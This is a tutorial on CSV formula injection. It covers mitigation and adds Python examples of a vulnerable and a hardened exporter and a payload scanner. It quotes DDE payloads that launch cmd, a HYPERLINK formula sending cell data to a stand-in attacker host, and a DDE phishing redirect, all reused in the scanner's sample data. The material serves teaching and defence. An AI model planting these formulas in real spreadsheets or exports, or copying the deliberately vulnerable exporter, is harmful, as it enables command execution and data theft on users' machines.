CSV Injection, also known as Formula Injection, occurs when a website embeds untrusted input in a CSV file it generates. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc opens the CSV, any cell that starts with = is interpreted by the software as a formula. Maliciously crafted formulas can be used for several attacks; the two worked through below are executing commands on the reader's machine through DDE and leaking cell contents through hyperlinks.
This attack is hard to mitigate, and quite a few bug bounty programs explicitly exclude it from scope. To remediate it, ensure that no cell begins with any of the following characters: =, +, -, @, Tab (0x09) or carriage return (0x0D).
Keep in mind that it is not sufficient to check that the untrusted user input does not start with one of these characters. You also need to handle the field separator (for example , or ;) and the quote characters (' or "), because an attacker can use them to terminate the current cell and start a new one, so that the dangerous character sits in the middle of the user input but at the beginning of a cell.
Alternatively, sanitize each field of the CSV so that the spreadsheet reads its content as text rather than as a formula.
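As an added example (not code from the original page), here is a Python sketch of the mitigation just described, together with the bypass against a naive first-character check: a deliberately vulnerable exporter, a hardened exporter that neutralizes each field and leaves quote escaping to csv.writer, and a parser that reports which cells a spreadsheet would treat as formulas. The trigger set adds Tab and carriage return to the four characters named on the page (an assumption taken from OWASP's guidance), and the sample rows and payloads are constructed for the example.

```python
import csv
import io

# Characters that make Excel or LibreOffice Calc evaluate a cell as a
# formula: the =, +, -, @ named on the page, plus Tab and carriage return
# (assumption from OWASP's CSV injection guidance, not from this page).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def formula_cells(csv_text):
    """Parse CSV text the way a spreadsheet does and return every cell that
    begins with a formula trigger as (row, col, value) tuples."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


def naive_export(rows):
    """Constructed VULNERABLE exporter. It prefixes a single quote only when
    the raw value starts with a trigger, then wraps each field in double
    quotes by hand without escaping embedded quotes. A value such as
        x","=cmd|'/C calc'!A0
    passes the first-character check, and its embedded quote and comma end
    the current cell so that the next cell begins with '='."""
    lines = []
    for row in rows:
        fields = ["'" + v if v.startswith(FORMULA_TRIGGERS) else v for v in row]
        lines.append(",".join('"' + f + '"' for f in fields))
    return "\n".join(lines) + "\n"


def neutralize(value):
    """Make one field read as text: a leading single quote pushes the trigger
    off the start of the cell. Quote escaping is the CSV writer's job."""
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def safe_export(rows):
    """Hardened exporter: neutralize every field, then let csv.writer quote
    all fields and double every embedded double quote (its default), so user
    input can never terminate a cell early."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(v) for v in row])
    return buf.getvalue()


# Constructed sample rows: a plain record, the page's DDE payload as the
# whole value, and the same payload smuggled in after a quote-and-comma.
SAMPLE_ROWS = [
    ["alice", "alice@example.com"],
    ["=cmd|'/C calc'!A0", "bob@example.com"],
    ['x","=cmd|\'/C calc\'!A0', "eve@example.com"],
]

if __name__ == "__main__":
    print("naive exporter, cells read as formulas:", formula_cells(naive_export(SAMPLE_ROWS)))
    print("safe exporter,  cells read as formulas:", formula_cells(safe_export(SAMPLE_ROWS)))
```

Run stand-alone, the naive exporter yields one formula cell at row 2, column 1 (the smuggled payload, now at the start of its own cell) while the hardened exporter yields none. The single-quote prefix also turns legitimate values such as -5 into text, so apply it to user-controlled string columns rather than to numeric columns the application itself produces.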
Create an xls file and enter =1+1 in a cell; after pressing Enter the value changes to 2, showing that the plus sign was evaluated as an operation.
Of course, it is not only + that triggers arithmetic: cells beginning with =, - or @ are also parsed as formulas by Excel.
DDE (Dynamic Data Exchange)
DDE is an inter-process communication protocol on Windows, a mechanism for exchanging data dynamically between two Windows applications: one acts as the server and processes requests, the other as the client and fetches data from the server. The affected spreadsheet programs include Microsoft Excel, LibreOffice and Apache OpenOffice, and on Windows Excel, Word, RTF documents and Outlook can all use DDE to update content from the output of an external application. So if we build a CSV file containing a DDE formula, Excel will try to launch that external application when the file is opened.
For example, if we build a csv or xls file containing the following string:
=cmd|'/C calc'!A0
Excel will try to launch the local CMD command, showing a friendly warning dialog first. If the user clicks Yes without reading it, Excel then offers to correct what it treats as a spelling error in the formula; declining that correction runs the cmd command.
The chain is: the business system accepts user input and exports it as CSV => a malicious user enters the payload through the interface => the victim downloads the file and opens it on their PC => the victim's PC is compromised. DDE injection is therefore an attack whose source is a website but whose final target is an ordinary user's PC.
OS command execution
Arbitrary OS command execution is the main hazard. As shown above, =cmd|'/C calc'!A0 pops a calculator and =cmd|'/K ipconfig'!A0 opens a window with the output of ipconfig; either can be used to probe whether the vulnerability exists. By analogy with XSS: if the system lets us get alert(1) to fire, we can execute arbitrary JavaScript, and what we do with it depends on how we choose to exploit it. The same holds here: once a harmless command runs, any command can.
Information leakage
The HYPERLINK function creates a shortcut that jumps to a location: when a cell containing HYPERLINK is clicked, Microsoft Excel opens whatever is stored at link_location. For example, set one of the cells in the table to:
=HYPERLINK("https://maliciousDomain.com/evil.html?data="&A1,"Click to view additional information")
This creates a cell showing the text "Click to view additional information"; when the user clicks it, the contents of A1 are sent to maliciousDomain.com, leaking the data. The same effect can also be achieved with the first (DDE) technique, for example:
=6-5 cmd|' /C "C:\Program Files\Internet Explorer\iexplore.exe" http:///asd.html'!A0
This sends the user to a phishing site, which can then be used to harvest password hashes and credentials.
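Added example, not code from the original page: a Python triage scanner that parses a received or exported CSV the way a spreadsheet would and classifies suspicious cells as DDE command payloads (the cmd|...!A0 form from the DDE and OS command execution sections), HYPERLINK exfiltration (this section), or a generic formula. The regular expressions are assumed heuristics rather than a grammar of Excel formulas, the trigger set adds Tab and carriage return to the page's four characters (assumption), and SAMPLE_CSV is a constructed export containing the payloads quoted on this page.

```python
import csv
import io
import re

# Same trigger set as the page's mitigation advice, with Tab and carriage
# return added (assumption, see lead-in).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Assumed triage heuristics, not a grammar of Excel formulas:
#  - a DDE call looks like  app|'args'!cell : a pipe, then a bang and a cell ref
#  - an exfiltration link calls HYPERLINK(...) somewhere in the formula
DDE_RE = re.compile(r"\|.*!\s*[A-Za-z]+\d+", re.DOTALL)
HYPERLINK_RE = re.compile(r"HYPERLINK\s*\(", re.IGNORECASE)


def classify(cell):
    """Return None for an ordinary cell, otherwise a label for the kind of
    formula injection the cell resembles. DDE is checked first because a
    DDE payload can itself launch a browser at a phishing URL."""
    if not cell.startswith(FORMULA_TRIGGERS):
        return None
    if DDE_RE.search(cell):
        return "dde-command"
    if HYPERLINK_RE.search(cell):
        return "hyperlink-exfil"
    return "formula"


def scan_csv(text):
    """Parse text as a spreadsheet would and return one finding per
    suspicious cell, in reading order."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            kind = classify(cell)
            if kind is not None:
                findings.append({"row": r, "col": c, "kind": kind, "cell": cell})
    return findings


# Constructed export containing the payloads discussed on this page plus a
# benign negative number, which the first-character rule also flags.
SAMPLE_CSV = (
    'name,notes\n'
    'alice,"regular text"\n'
    '"=cmd|\'/C calc\'!A0",pops a calculator\n'
    '"=cmd|\'/K ipconfig\'!A0",runs ipconfig\n'
    '"=HYPERLINK(""https://maliciousDomain.com/evil.html?data=""&A1,'
    '""Click to view additional information"")",sends A1 to the attacker\n'
    '"=6-5 cmd|\' /C ""C:\\Program Files\\Internet Explorer\\iexplore.exe""'
    ' http:///asd.html\'!A0",opens a phishing page\n'
    '-42,an ordinary negative number\n'
)

if __name__ == "__main__":
    for f in scan_csv(SAMPLE_CSV):
        print(f"row {f['row']} col {f['col']}: {f['kind']:15} {f['cell']}")
```

The scan reports three DDE command cells, one HYPERLINK exfiltration cell and one generic formula; the last is the benign -42, which shows why findings are leads for a human to confirm rather than a verdict, and why blanket single-quote neutralization turns legitimate negative numbers into text.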